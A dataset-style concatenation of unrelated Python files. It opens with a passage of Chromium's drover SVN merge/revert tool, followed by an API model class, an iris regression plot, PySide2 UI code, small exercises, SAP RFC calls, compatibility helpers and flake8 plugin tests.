    print command
    os.system(command)
    match = re.search(r"^[a-z]+://.*/(.*)", branch_url)
    if match:
        os.chdir(match.group(1))
    # This line is extremely important due to the way svn behaves in the
    # set-depths action. If parents aren't handled before children, the child
    # directories get clobbered and the merge step fails.
    paths.sort()
    # Checkout the directories that already exist
    for path in paths:
        if (export_map.has_key(path) and not revert):
            print "Exclude new directory " + path
            continue
        subpaths = path.split('/')
        # In the normal case, where no url override is specified and it's just
        # chromium source, it's necessary to remove the 'trunk' from the filepath,
        # since in the checkout we include 'trunk' or 'branch/\d+'.
        #
        # However, when a url is specified we want to preserve that because it's
        # a part of the filepath and necessary for path operations on svn (because
        # frankly, we are checking out the correct top level, and not hacking it).
        if pop:
            subpaths.pop(0)
        base = ''
        for subpath in subpaths:
            base += '/' + subpath
            # This logic ensures that you don't empty out any directories
            if not os.path.exists("." + base):
                command = ('svn update --depth empty ' + "." + base)
                print command
                os.system(command)
    if (revert):
        files = getAllFilesInRevision(files_info)
    else:
        files = getExistingFilesInRevision(files_info)
    for f in files:
        # Prevent the tool from clobbering the src directory
        if (f == ""):
            continue
        command = ('svn up ".' + f + '"')
        print command
        os.system(command)
def mergeRevision(url, revision):
    """svn-merge the single change *revision* of *url* into the working copy,
    path by path; paths that will be exported separately are skipped."""
    paths = getBestMergePaths(url, revision)
    export_map = getBestExportPathsMap(url, revision)
    for path in paths:
        if export_map.has_key(path):
            continue
        command = ('svn merge -N -r ' + str(revision-1) + ":" + str(revision) + " ")
        command += " --ignore-ancestry "
        command += " -x --ignore-eol-style "
        command += url + path + "@" + str(revision) + " ." + path
        print command
        os.system(command)
def exportRevision(url, revision):
    """Export (copy without history) every directory added in *revision*,
    parents first, then `svn add` each one to the working copy."""
    paths = getBestExportPathsMap(url, revision).keys()
    paths.sort()
    for path in paths:
        command = ('svn export -N ' + url + path + "@" + str(revision) + " ." +
                   path)
        print command
        os.system(command)
        command = 'svn add .' + path
        print command
        os.system(command)
def deleteRevision(url, revision):
    """svn-delete, deepest paths first, the directories removed by
    *revision* (file deletes are handled by the merge itself)."""
    paths = getBestDeletePathsMap(url, revision).keys()
    paths.sort()
    paths.reverse()
    for path in paths:
        command = "svn delete ." + path
        print command
        os.system(command)
def revertExportRevision(url, revision):
    """Undo exportRevision(): svn-delete, deepest first, the directories
    that *revision* had added."""
    paths = getBestExportPathsMap(url, revision).keys()
    paths.sort()
    paths.reverse()
    for path in paths:
        command = "svn delete ." + path
        print command
        os.system(command)
def revertRevision(url, revision):
    """Reverse-merge *revision* (svn merge -c -REV) into the working copy."""
    command = ('svn merge --ignore-ancestry -c -%d %s .' % (revision, url))
    print command
    os.system(command)
def getFileInfo(url, revision):
    """Return [[status, repo_path, src_subdir, basename], ...] for every file
    touched by *revision*, parsed from verbose `svn log` output.

    The result is cached in the module-global files_info_, so only the first
    call hits the network.
    """
    global files_info_
    if (files_info_ != None):
        return files_info_
    svn_log = subprocess2.check_output(
        ['svn', 'log', url, '-r', str(revision), '-v']).splitlines()
    info = []
    for line in svn_log:
        # A workaround to dump the (from .*) stuff, regex not so friendly in the 2nd
        # pass...
        match = re.search(r"(.*) \(from.*\)", line)
        if match:
            line = match.group(1)
        match = re.search(file_pattern_, line)
        if match:
            info.append([match.group(1).strip(), match.group(2).strip(),
                         match.group(3).strip(), match.group(4).strip()])
    files_info_ = info
    return info
def getBestMergePaths(url, revision):
    """Return the unique src-relative directories touched by *revision*."""
    files_info = getFileInfo(url, revision)
    return getBestMergePaths2(files_info, revision)
def getBestMergePaths2(files_info, revision):
    """Return the unique directory components (field 2) of *files_info*;
    *revision* is unused but kept for signature parity with the 1-arg form."""
    unique_dirs = {entry[2] for entry in files_info}
    return list(unique_dirs)
def getBestExportPathsMap(url, revision):
    """Map of directories newly added in *revision* (cached globally)."""
    files_info = getFileInfo(url, revision)
    return getBestExportPathsMap2(files_info, revision)
def getBestExportPathsMap2(files_info, revision):
    """Return {"<dir>/<name>": ""} for every *directory* added ('A') in the
    revision; cached in the module-global export_map_.

    Added plain files are excluded — they arrive via the merge itself.
    """
    global export_map_
    if export_map_:
        return export_map_
    result = {}
    for file_info in files_info:
        if (file_info[0] == "A"):
            # Only keep additions that are directories in the repository.
            if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
                              revision)):
                result[file_info[2] + "/" + file_info[3]] = ""
    export_map_ = result
    return result
def getBestDeletePathsMap(url, revision):
    """Map of directories deleted in *revision* (cached globally)."""
    files_info = getFileInfo(url, revision)
    return getBestDeletePathsMap2(files_info, revision)
def getBestDeletePathsMap2(files_info, revision):
    """Return {"<dir>/<name>": ""} for every *directory* deleted ('D') in the
    revision; cached in the module-global delete_map_."""
    global delete_map_
    if delete_map_:
        return delete_map_
    result = {}
    for file_info in files_info:
        if (file_info[0] == "D"):
            # Only keep deletions that are directories in the repository.
            if(isSVNDirectory("svn://svn.chromium.org/chrome/" + file_info[1],
                              revision)):
                result[file_info[2] + "/" + file_info[3]] = ""
    delete_map_ = result
    return result
def getExistingFilesInRevision(files_info):
    """Return "<dir>/<name>" for every entry that is not an addition.

    Anything that's 'A' will require special treatment (either a merge or an
    export + add), so added entries are excluded here.
    """
    return ['/'.join((entry[2], entry[3]))
            for entry in files_info if entry[0] != 'A']
def getAllFilesInRevision(files_info):
    """Return "<dir>/<name>" for every entry in *files_info*, additions
    included (used by the revert path, which must touch added files too)."""
    return ['/'.join((entry[2], entry[3])) for entry in files_info]
def getSVNAuthInfo(folder=None):
    """Fetches SVN authorization information in the subversion auth folder and
    returns it as a dictionary of dictionaries (filename -> parsed K/V pairs).

    Errors (missing folder, unreadable files) are deliberately swallowed and
    yield an empty/partial result.
    """
    if not folder:
        if sys.platform == 'win32':
            # BUG FIX: the original used '%%APPDATA%...'; ntpath.expandvars
            # treats '%%' as a literal '%', so the variable never expanded
            # and the auth folder was never found on Windows.
            folder = '%APPDATA%\\Subversion\\auth'
        else:
            folder = '~/.subversion/auth'
    folder = os.path.expandvars(os.path.expanduser(folder))
    svn_simple_folder = os.path.join(folder, 'svn.simple')
    results = {}
    try:
        for auth_file in os.listdir(svn_simple_folder):
            # Read the SVN auth file, convert it into a dictionary, and store it.
            results[auth_file] = dict(re.findall(r'K [0-9]+\n(.*)\nV [0-9]+\n(.*)\n',
                open(os.path.join(svn_simple_folder, auth_file)).read()))
    except Exception as _:
        pass
    return results
def getCurrentSVNUsers(url):
    """Tries to fetch the current SVN user(s) for the current checkout by
    scanning the SVN authorization folder for a match with the current SVN
    URL.

    Returns a list of usernames; google.com accounts also get a
    chromium.org alias appended.
    """
    netloc = urlparse.urlparse(url)[1]
    auth_infos = getSVNAuthInfo()
    results = []
    for _, auth_info in auth_infos.iteritems():
        if ('svn:realmstring' in auth_info
            and netloc in auth_info['svn:realmstring']):
            username = auth_info['username']
            results.append(username)
            if 'google.com' in username:
                results.append(username.replace('google.com', 'chromium.org'))
    return results
def prompt(question):
    """Ask *question* on stdout and loop until the answer starts with 'y'
    (returns True) or 'n' (returns False)."""
    while True:
        # Trailing comma keeps the cursor on the same line (Python 2 print).
        print question + " [y|n]:",
        answer = sys.stdin.readline()
        if answer.lower().startswith('n'):
            return False
        elif answer.lower().startswith('y'):
            return True
def text_prompt(question, default):
    """Ask *question*; return *default* when the user just presses enter.

    NOTE(review): a non-empty answer is returned exactly as read, including
    the trailing newline — callers appear to tolerate this; confirm before
    changing.
    """
    print question + " [" + default + "]:"
    answer = sys.stdin.readline()
    if answer.strip() == "":
        return default
    return answer
def drover(options, args):
    """Carry out the requested merge or revert described by *options*.

    Builds (or reuses, with --local) a sparse working copy, applies the
    svn merge/revert, writes a change description file, and optionally
    uploads/commits it via gcl. Returns a process-style exit status.
    """
    revision = options.revert or options.merge
    # Initialize some variables used below. They can be overwritten by
    # the drover.properties file.
    BASE_URL = "svn://svn.chromium.org/chrome"
    REVERT_ALT_URLS = ['svn://svn.chromium.org/blink',
                       'svn://svn.chromium.org/chrome-internal',
                       'svn://svn.chromium.org/native_client']
    TRUNK_URL = BASE_URL + "/trunk/src"
    BRANCH_URL = BASE_URL + "/branches/$branch/src"
    SKIP_CHECK_WORKING = True
    PROMPT_FOR_AUTHOR = False
    NO_ALT_URLS = options.no_alt_urls
    DEFAULT_WORKING = "drover_" + str(revision)
    if options.branch:
        DEFAULT_WORKING += ("_" + options.branch)
    if not isMinimumSVNVersion(1, 5):
        print "You need to use at least SVN version 1.5.x"
        return 1
    # Override the default properties if there is a drover.properties file.
    global file_pattern_
    if os.path.exists("drover.properties"):
        print 'Using options from %s' % os.path.join(
            os.getcwd(), 'drover.properties')
        FILE_PATTERN = file_pattern_
        # drover.properties is executed as Python and may rebind the
        # URL/pattern variables defined above.
        f = open("drover.properties")
        exec(f)
        f.close()
        if FILE_PATTERN:
            file_pattern_ = FILE_PATTERN
        NO_ALT_URLS = True
    if options.revert and options.branch:
        print 'Note: --branch is usually not needed for reverts.'
        url = BRANCH_URL.replace("$branch", options.branch)
    elif options.merge and options.sbranch:
        url = BRANCH_URL.replace("$branch", options.sbranch)
    elif options.revert:
        url = options.url or BASE_URL
        # Reverts against arbitrary urls can touch paths outside src/.
        file_pattern_ = r"[ ]+([MADUC])[ ]+((/.*)/(.*))"
    else:
        url = TRUNK_URL
    working = options.workdir or DEFAULT_WORKING
    if options.local:
        working = os.getcwd()
        if not inCheckoutRoot(working):
            print "'%s' appears not to be the root of a working copy" % working
            return 1
        if (isSVNDirty() and not
            prompt("Working copy contains uncommitted files. Continue?")):
            return 1
    if options.revert and not NO_ALT_URLS and not options.url:
        # Guess which repository the revision lives in: pick the first
        # candidate whose last change at that revision is recent (<180 days).
        for cur_url in [url] + REVERT_ALT_URLS:
            try:
                commit_date_str = getSVNInfo(
                    cur_url, options.revert).get('Last Changed Date', 'x').split()[0]
                commit_date = datetime.datetime.strptime(commit_date_str, '%Y-%m-%d')
                if (datetime.datetime.now() - commit_date).days < 180:
                    if cur_url != url:
                        print 'Guessing svn repo: %s.' % cur_url,
                        print 'Use --no-alt-urls to disable heuristic.'
                        url = cur_url
                    break
            except ValueError:
                pass
    command = 'svn log ' + url + " -r "+str(revision) + " -v"
    os.system(command)
    if not (options.revertbot or prompt("Is this the correct revision?")):
        return 0
    if (os.path.exists(working)) and not options.local:
        if not (options.revertbot or SKIP_CHECK_WORKING or
                prompt("Working directory: '%s' already exists, clobber?" % working)):
            return 0
        gclient_utils.rmtree(working)
    if not options.local:
        os.makedirs(working)
        os.chdir(working)
    if options.merge:
        action = "Merge"
        if not options.local:
            branch_url = BRANCH_URL.replace("$branch", options.branch)
            # Checkout everything but stuff that got added into a new dir
            checkoutRevision(url, revision, branch_url)
        # Merge everything that changed
        mergeRevision(url, revision)
        # "Export" files that were added from the source and add them to branch
        exportRevision(url, revision)
        # Delete directories that were deleted (file deletes are handled in the
        # merge).
        deleteRevision(url, revision)
    elif options.revert:
        action = "Revert"
        pop_em = not options.url
        checkoutRevision(url, revision, url, True, pop_em)
        revertRevision(url, revision)
        revertExportRevision(url, revision)
    # Check the base url so we actually find the author who made the change
    if options.auditor:
        author = options.auditor
    else:
        author = getAuthor(url, revision)
        if not author:
            author = getAuthor(TRUNK_URL, revision)
    # Check that the author of the CL is different than the user making
    # the revert. If they're the same, then we'll want to prompt the user
    # for a different reviewer to TBR.
    current_users = getCurrentSVNUsers(BASE_URL)
    is_self_revert = options.revert and author in current_users
    # Write the change description ("<revision>.txt") fed to gcl.
    filename = str(revision)+".txt"
    out = open(filename,"w")
    drover_title = '%s %s' % (action, revision)
    revision_log = getRevisionLog(url, revision).splitlines()
    if revision_log:
        commit_title = revision_log[0]
        # Limit title to 68 chars so git log --oneline is <80 chars.
        max_commit_title = 68 - (len(drover_title) + 3)
        if len(commit_title) > max_commit_title:
            commit_title = commit_title[:max_commit_title-3] + '...'
        drover_title += ' "%s"' % commit_title
    out.write(drover_title + '\n\n')
    for line in revision_log:
        out.write('> %s\n' % line)
    if author:
        out.write("\nTBR=" + author)
    out.close()
    change_cmd = 'change ' + str(revision) + " " + filename
    if options.revertbot:
        # Run gcl non-interactively by pointing SVN_EDITOR at a no-op.
        if sys.platform == 'win32':
            os.environ['SVN_EDITOR'] = 'cmd.exe /c exit'
        else:
            os.environ['SVN_EDITOR'] = 'true'
    runGcl(change_cmd)
    os.unlink(filename)
    if options.local:
        return 0
    print author
    print revision
    print ("gcl upload " + str(revision) +
           " --send_mail --no_presubmit --reviewers=" + author)
    if options.revertbot or prompt("Would you like to upload?"):
        if PROMPT_FOR_AUTHOR or is_self_revert:
            author = text_prompt("Enter new author or press enter to accept default",
                                 author)
        if options.revertbot and options.revertbot_reviewers:
            author += ","
            author += options.revertbot_reviewers
        gclUpload(revision, author)
    else:
        print "Deleting the changelist."
        print "gcl delete " + str(revision)
        runGcl("delete " + str(revision))
        return 0
    # We commit if the reverbot is set to commit automatically, or if this is
    # not the revertbot and the user agrees.
    if options.revertbot_commit or (not options.revertbot and
                                    prompt("Would you like to commit?")):
        print "gcl commit " + str(revision) + " --no_presubmit --force"
        return runGcl("commit " + str(revision) + " --no_presubmit --force")
    else:
        return 0
def main():
    """Parse and validate command-line options, then hand off to drover()."""
    option_parser = optparse.OptionParser(usage=USAGE % {"app": sys.argv[0]})
    option_parser.add_option('-m', '--merge', type="int",
                             help='Revision to merge from trunk to branch')
    option_parser.add_option('-b', '--branch',
                             help='Branch to revert or merge from')
    option_parser.add_option('-l', '--local', action='store_true',
                             help='Local working copy to merge to')
    option_parser.add_option('-s', '--sbranch',
                             help='Source branch for merge')
    option_parser.add_option('-r', '--revert', type="int",
                             help='Revision to revert')
    option_parser.add_option('-w', '--workdir',
                             help='subdir to use for the revert')
    option_parser.add_option('-u', '--url',
                             help='svn url to use for the revert')
    option_parser.add_option('-a', '--auditor',
                             help='overrides the author for reviewer')
    option_parser.add_option('--revertbot', action='store_true',
                             default=False)
    option_parser.add_option('--no-alt-urls', action='store_true',
                             help='Disable heuristics used to determine svn url')
    option_parser.add_option('--revertbot-commit', action='store_true',
                             default=False)
    option_parser.add_option('--revertbot-reviewers')
    options, args = option_parser.parse_args()
    # OptionParser.error() exits the process, so the `return 1` lines below
    # are defensive only.
    if not options.merge and not options.revert:
        option_parser.error("You need at least --merge or --revert")
        return 1
    if options.merge and not (options.branch or options.local):
        option_parser.error("--merge requires --branch or --local")
        return 1
    if options.local and (options.revert or options.branch):
        option_parser.error("--local cannot be used with --revert or --branch")
        return 1
    return drover(options, args)
if __name__ == "__main__":
    try:
        sys.exit(main())
    except KeyboardInterrupt:
        # Exit quietly with a conventional non-zero status on Ctrl-C.
        sys.stderr.write('interrupted\n')
        sys.exit(1)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
MagicTelecomAPILib.Models.Account
This file was automatically generated by APIMATIC v2.0 on 06/22/2016
"""
from MagicTelecomAPILib.APIHelper import APIHelper
class Account(object):
    """Implementation of the 'Account' model.

    A plain data holder for the API's Account payload. Every field defaults
    to None and may be initialised via keyword arguments.

    Attributes:
        number (string): TODO: type description here.
        roles (list of string): TODO: type description here.
        email (string): TODO: type description here.
        contact_number (string): TODO: type description here.
        firstname (string): TODO: type description here.
        lastname (string): TODO: type description here.

    """

    # Mapping between API property names and model attribute names. They
    # coincide today, but generated models keep the table to allow renames.
    _NAME_MAP = {
        "number": "number",
        "roles": "roles",
        "email": "email",
        "contact_number": "contact_number",
        "firstname": "firstname",
        "lastname": "lastname",
    }

    def __init__(self, **kwargs):
        """Constructor for the Account class.

        Any documented attribute may be supplied as a keyword argument;
        keywords that do not name a known field are silently ignored.
        """
        # Every known field starts out as None.
        for attribute in self._NAME_MAP.values():
            setattr(self, attribute, None)
        # Apply only the keyword arguments that name a known field.
        for key, value in kwargs.items():
            if key in self._NAME_MAP:
                setattr(self, self._NAME_MAP[key], value)

    def resolve_names(self):
        """Creates a dictionary representation of this object.

        The returned dictionary uses the API's property names, which may
        differ from this model's attribute names.

        Returns:
            dict: The dictionary representing the object.
        """
        return APIHelper.resolve_names(self, self._NAME_MAP, dict())
|
nilq/baby-python
|
python
|
# Linear regression on iris dataset
import numpy as np
import matplotlib.pyplot as plt
import os

# Figures are written under $PYPROBML/figures; the environment variable must
# be set before running.
figdir = os.path.join(os.environ["PYPROBML"], "figures")
def save_fig(fname): plt.savefig(os.path.join(figdir, fname))

import seaborn as sns
from sklearn.linear_model import LinearRegression
from sklearn import datasets

iris = datasets.load_iris()
xidx = 2  # column of iris.data used as the single regressor
ys = [1, 3]  # target columns; one fitted line + scatter figure per target
for yidx in ys:
    # Slicing with xidx:xidx+1 keeps the 2-D (n, 1) shape sklearn expects.
    X = iris.data[:, xidx:xidx+1]
    Y = iris.data[:, yidx:yidx+1]
    linreg = LinearRegression()
    linreg.fit(X, Y)
    # Evaluate the fitted line on an evenly spaced grid over the data range.
    xs = np.arange(np.min(X), np.max(X), 0.1).reshape(-1,1)
    yhat = linreg.predict(xs)
    plt.plot(xs, yhat)
    sns.scatterplot(x=X[:,0], y=Y[:,0])
    plt.xlabel(iris.feature_names[xidx])
    plt.ylabel(iris.feature_names[yidx])
    plt.xlim(np.min(X), np.max(X))
    plt.ylim(np.min(Y), np.max(Y))
    fname = "iris-linreg{}".format(yidx)
    save_fig(fname)
    plt.show()
|
nilq/baby-python
|
python
|
from clases.dia_mañana import *
from clases.yinyang import *
from clases.alternativa import *

if __name__ == "__main__":
    # Menu (Spanish UI strings preserved): pick which exercise to run.
    print("¿Qué ejercicio quieres ver?:", "\n", "1)Dia del mañana", "\n", "2)Inmortal", "\n", "3)Alternativa herencia multiple")
    n = int(input("Número del ejercicio: "))
    if n == 1:
        # Exercise 1: creating then deleting a city object triggers its
        # destructor behaviour.
        destrucion = str(input("¿Qué ciudad quieres destruir, Los Ángeles o Nueva York?"))
        if destrucion == "Los Ángeles":
            la = LosAngeles()
            del la
        elif destrucion == "Nueva York":
            ny = NuevaYork()
            del ny
        else:
            print("La ciudad no es válida")
    if n == 2:
        # Exercise 2: create the yin/yang pair, then delete one of them.
        yin = Yin()
        yang = Yang()
        del(yang)
    if n == 3:
        # Exercise 3: multiple-inheritance demo — four walls, one glazed
        # window per wall, then report the house's glazed surface.
        pared_norte = Pared("NORTE")
        pared_oeste = Pared("OESTE")
        pared_sur = Pared("SUR")
        pared_este = Pared("ESTE")
        ventana_norte = InterfazCristal(pared_norte, 0.5)
        ventana_oeste = InterfazCristal(pared_oeste, 1)
        ventana_sur = InterfazCristal(pared_sur, 2)
        ventana_este = InterfazCristal(pared_este, 1)
        casa = Casa(4, [pared_norte, pared_oeste, pared_sur, pared_este], [ventana_norte, ventana_este, ventana_oeste, ventana_sur])
        print(casa.superficie_acristalada())
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'expstatus.ui'
##
## Created by: Qt User Interface Compiler version 5.15.0
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (
QCoreApplication,
QDate,
QDateTime,
QMetaObject,
QObject,
QPoint,
QRect,
QSize,
Qt,
QTime,
QUrl,
)
from PySide2.QtGui import (
QBrush,
QColor,
QConicalGradient,
QCursor,
QFont,
QFontDatabase,
QIcon,
QKeySequence,
QLinearGradient,
QPainter,
QPalette,
QPixmap,
QRadialGradient,
)
from PySide2.QtWidgets import *
class Ui_ExposureStatus(object):
def setupUi(self, ExposureStatus):
if not ExposureStatus.objectName():
ExposureStatus.setObjectName(u"ExposureStatus")
ExposureStatus.resize(260, 100)
ExposureStatus.setMinimumSize(QSize(260, 100))
ExposureStatus.setMaximumSize(QSize(520, 200))
font = QFont()
font.setPointSize(8)
ExposureStatus.setFont(font)
ExposureStatus.setIconSize(QSize(15, 15))
self.centralwidget = QWidget(ExposureStatus)
self.centralwidget.setObjectName(u"centralwidget")
self.gridLayout = QGridLayout(self.centralwidget)
self.gridLayout.setObjectName(u"gridLayout")
self.label_status = QLabel(self.centralwidget)
self.label_status.setObjectName(u"label_status")
font1 = QFont()
font1.setPointSize(12)
font1.setBold(True)
font1.setWeight(75)
self.label_status.setFont(font1)
self.label_status.setFrameShape(QFrame.StyledPanel)
self.label_status.setFrameShadow(QFrame.Sunken)
self.label_status.setAlignment(Qt.AlignCenter)
self.gridLayout.addWidget(self.label_status, 0, 0, 1, 1)
self.splitter = QSplitter(self.centralwidget)
self.splitter.setObjectName(u"splitter")
self.splitter.setOrientation(Qt.Horizontal)
self.label_integrating = QLabel(self.splitter)
self.label_integrating.setObjectName(u"label_integrating")
font2 = QFont()
font2.setPointSize(12)
font2.setBold(False)
font2.setWeight(50)
self.label_integrating.setFont(font2)
self.label_integrating.setFrameShape(QFrame.StyledPanel)
self.label_integrating.setFrameShadow(QFrame.Sunken)
self.label_integrating.setLineWidth(2)
self.label_integrating.setAlignment(Qt.AlignCenter)
self.splitter.addWidget(self.label_integrating)
self.label_reading = QLabel(self.splitter)
self.label_reading.setObjectName(u"label_reading")
self.label_reading.setFont(font2)
self.label_reading.setFrameShape(QFrame.StyledPanel)
self.label_reading.setFrameShadow(QFrame.Sunken)
self.label_reading.setLineWidth(2)
self.label_reading.setAlignment(Qt.AlignCenter)
self.splitter.addWidget(self.label_reading)
self.gridLayout.addWidget(self.splitter, 1, 0, 1, 1)
ExposureStatus.setCentralWidget(self.centralwidget)
self.retranslateUi(ExposureStatus)
QMetaObject.connectSlotsByName(ExposureStatus)
# setupUi
def retranslateUi(self, ExposureStatus):
    """Install translated UI strings (appears to be pyside/Qt Designer
    generated code -- presumably regenerated from a .ui file; confirm
    before hand-editing)."""
    ExposureStatus.setWindowTitle(
        QCoreApplication.translate("ExposureStatus", u"ExpStatus", None)
    )
    # if QT_CONFIG(tooltip)
    ExposureStatus.setToolTip(
        QCoreApplication.translate("ExposureStatus", u"azcam exposure status", None)
    )
    # endif // QT_CONFIG(tooltip)
    # if QT_CONFIG(whatsthis)
    ExposureStatus.setWhatsThis("")
    # endif // QT_CONFIG(whatsthis)
    # The status label starts empty; "Exposing"/"Reading" are the captions
    # for the two indicator labels created in setupUi.
    self.label_status.setText("")
    self.label_integrating.setText(
        QCoreApplication.translate("ExposureStatus", u"Exposing", None)
    )
    self.label_reading.setText(
        QCoreApplication.translate("ExposureStatus", u"Reading", None)
    )
    # retranslateUi
|
nilq/baby-python
|
python
|
# Read two strings, then a third; print YES when the third is a
# rearrangement (anagram) of the first two concatenated.
first = list(input())
sec = list(input())
te = first + sec
te.sort()
third = list(input())
third.sort()
if te==third:
    print("YES")
else:
    print("NO")
# Golfed variant of the same check. NOTE(review): it calls input() three
# more times, so running this file end-to-end needs six input lines --
# presumably the two solutions were meant as alternatives, not to run together.
s,i=sorted,input;print('YNEOS'[s(i()+i())!=s(i())::2])
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from ..components import *
from ..container import *
from ..elements import *
__all__ = ['regression_report']
def regression_report(truth, predict, label=None, per_target=True,
                      target_names=None, title=None):
    """Build a standard regression report: a summary plus a result attachment.

    Parameters
    ----------
    truth : np.ndarray
        Ground truth (correct) target values.
    predict : np.ndarray
        Predicted target values.
    label : np.ndarray | list
        If specified, will compute the regression scores for each label class.
    per_target : bool
        Whether or not to compute the regression score for each dimension?
        (default True)
    target_names : np.ndarray | list
        Name of each dimension in regression results.
        If not specified, will use the coordinate of each dimension, e.g.,
        "(0,0,0)".
    title : str
        Optional title of this regression summary table.
    """
    # Assemble the two report elements first, then wrap them.
    summary = regression_summary(
        truth=truth,
        predict=predict,
        label=label,
        per_target=per_target,
        target_names=target_names,
    )
    attachment = regression_result_attachment(
        truth=truth, predict=predict, title='Regression Result'
    )
    body = [summary, attachment]
    # A titled report becomes a Section; an untitled one is a bare Group.
    return Section(title, body) if title else Group(body)
|
nilq/baby-python
|
python
|
# encoding: utf-8
# Copyright 2011 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
def nullUpgradeStep(setupTool):
    """No-op upgrade step, used when a profile upgrade needs no custom work."""
    return None
|
nilq/baby-python
|
python
|
def range_test(num):
    """Return True when *num* lies in the inclusive range 1..500.

    Idiom fix: the original `if cond: return False else: return True`
    collapses to a single chained comparison with identical behavior.
    """
    return 1 <= num <= 500
# Prompt the user for an integer and report whether it passes range_test
# (i.e. lies in 1..500).
num = int(input("Enter a number: "))
if range_test(num):
    print( "{:d} is in range.".format(num))
else:
    print("The number you entered is outside the range!")
|
nilq/baby-python
|
python
|
# Python - 3.6.0
def is_sator_square(tablet):
    """Return True if *tablet* (a square of equal-length rows) is a sator
    square: every cell equals its 180-degree rotation, its transpose, and
    the transpose of its rotation."""
    size = len(tablet)
    return all(
        tablet[i][j] == tablet[-(i + 1)][-(j + 1)]
        == tablet[j][i] == tablet[-(j + 1)][-(i + 1)]
        for i in range(size)
        for j in range(size)
    )
|
nilq/baby-python
|
python
|
from platform import system, release
from sys import version_info
from configparser import ConfigParser
from pyrfc import Connection, get_nwrfclib_version
# Load connection parameters from the [test] section of pyrfc.cfg and open
# an SAP NW RFC connection.
config = ConfigParser()
config.read('pyrfc.cfg')
# NOTE(review): _sections is a private ConfigParser attribute -- confirm
# dict(config['test']) would not be preferable.
params = config._sections['test']
conn = Connection(**params)
# Report the runtime environment and the NW RFC library version.
print(('Platform:', system(), release()))
print(('Python version:', version_info))
print(('SAP NW RFC:', get_nwrfclib_version()))
# Call the custom function module once with dict-shaped table rows...
result = conn.call('/COE/RBP_PAM_SERVICE_ORD_CHANG', IV_ORDERID='4711', IT_NOTICE_NOTIFICATION=[{'': 'ABCD'}, {'': 'XYZ'}])
for line in result['ET_STRING']:
    print(line)
for line in result['ET_TABLE']:
    print(line)
# ...and once with plain strings as rows.
result = conn.call('/COE/RBP_PAM_SERVICE_ORD_CHANG', IV_ORDERID='4711', IT_NOTICE_NOTIFICATION=['ABCD', 'XYZ'])
for line in result['ET_STRING']:
    print(line)
for line in result['ET_TABLE']:
    print(line)
|
nilq/baby-python
|
python
|
import platform, sys
# Platform flag: True when running on Windows.
if platform.system() == 'Windows':  # pragma: no cover
    WIN = True
else:
    WIN = False
# True if we are running on Python 2.
PY2 = sys.version_info[0] == 2
if not PY2:  # pragma: no cover
    from urllib.parse import quote, unquote
    # Python 3: text and native strings are both ``str``.
    string_type = str
    unicode_text = str
    byte_string = bytes
    wsgi_string = str
    def u_(s):
        # Coerce *s* to text.
        return str(s)
    def bytes_(s):
        # Coerce *s* to ASCII-encoded bytes (strict: raises on non-ASCII).
        return str(s).encode('ascii', 'strict')
    def percent_encode(string, safe, encoding):
        return quote(string, safe, encoding, errors='strict')
    def percent_decode(string):
        return unquote(string)
else:  # pragma: no cover
    from urllib import quote, unquote
    # Python 2: distinguish byte strings (str) from unicode text.
    string_type = basestring
    unicode_text = unicode
    byte_string = str
    wsgi_string = str
    def u_(s):
        # Decode *s* from UTF-8 to unicode text.
        return unicode(s, 'utf-8')
    def bytes_(s):
        return str(s)
    # NOTE(review): this branch accepts keyword arguments only, while the
    # Py3 variant takes ``safe``/``encoding`` positionally -- confirm all
    # callers pass them by keyword.
    def percent_encode(string, **kwargs):
        encoding = kwargs.pop('encoding')
        return quote(string.encode(encoding), **kwargs)
    def percent_decode(string):
        return unquote(string)
def with_metaclass(meta, base=object):
    """Create a base class with a metaclass."""
    return meta("NewBase", (base,), {})
|
nilq/baby-python
|
python
|
"""Tests for flake8.plugins.manager.PluginManager."""
import mock
from flake8.plugins import manager
def create_entry_point_mock(name):
    """Build a mocked EntryPoint exposing only a ``name`` attribute."""
    entry_point = mock.Mock(spec=['name'])
    # ``name`` is reserved by Mock's constructor, so it must be set afterwards.
    entry_point.name = name
    return entry_point
@mock.patch('entrypoints.get_group_all')
def test_calls_entrypoints_on_instantiation(get_group_all):
    """Verify that we call get_group_all when we create a manager."""
    get_group_all.return_value = []
    # Constructing the manager must query the entry-point group exactly once.
    manager.PluginManager(namespace='testing.entrypoints')
    get_group_all.assert_called_once_with('testing.entrypoints')
@mock.patch('entrypoints.get_group_all')
def test_calls_entrypoints_creates_plugins_automaticaly(get_group_all):
    """Verify that we create Plugins on instantiation."""
    get_group_all.return_value = [
        create_entry_point_mock('T100'),
        create_entry_point_mock('T200'),
    ]
    plugin_mgr = manager.PluginManager(namespace='testing.entrypoints')
    get_group_all.assert_called_once_with('testing.entrypoints')
    # Each entry point becomes a Plugin keyed by its name.
    assert 'T100' in plugin_mgr.plugins
    assert 'T200' in plugin_mgr.plugins
    assert isinstance(plugin_mgr.plugins['T100'], manager.Plugin)
    assert isinstance(plugin_mgr.plugins['T200'], manager.Plugin)
@mock.patch('entrypoints.get_group_all')
def test_handles_mapping_functions_across_plugins(get_group_all):
    """Verify we can use the PluginManager call functions on all plugins."""
    entry_point_mocks = [
        create_entry_point_mock('T100'),
        create_entry_point_mock('T200'),
    ]
    get_group_all.return_value = entry_point_mocks
    plugin_mgr = manager.PluginManager(namespace='testing.entrypoints')
    plugins = [plugin_mgr.plugins[name] for name in plugin_mgr.names]
    # map() over the identity function must yield the plugins themselves.
    assert list(plugin_mgr.map(lambda x: x)) == plugins
@mock.patch('entrypoints.get_group_all')
def test_local_plugins(get_group_all):
    """Verify PluginManager can load given local plugins."""
    # No installed entry points; only the locally declared one.
    get_group_all.return_value = []
    plugin_mgr = manager.PluginManager(
        namespace='testing.entrypoints',
        local_plugins=['X = path.to:Plugin']
    )
    assert plugin_mgr.plugins['X'].entry_point.module_name == 'path.to'
|
nilq/baby-python
|
python
|
# String identifiers for JavaScript runtimes -- presumably used as runtime
# names/keys elsewhere in the package (each value doubles as its display name).
PyV8 = "PyV8"
Node = "Node"
JavaScriptCore = "JavaScriptCore"
SpiderMonkey = "SpiderMonkey"
JScript = "JScript"
PhantomJS = "PhantomJS"
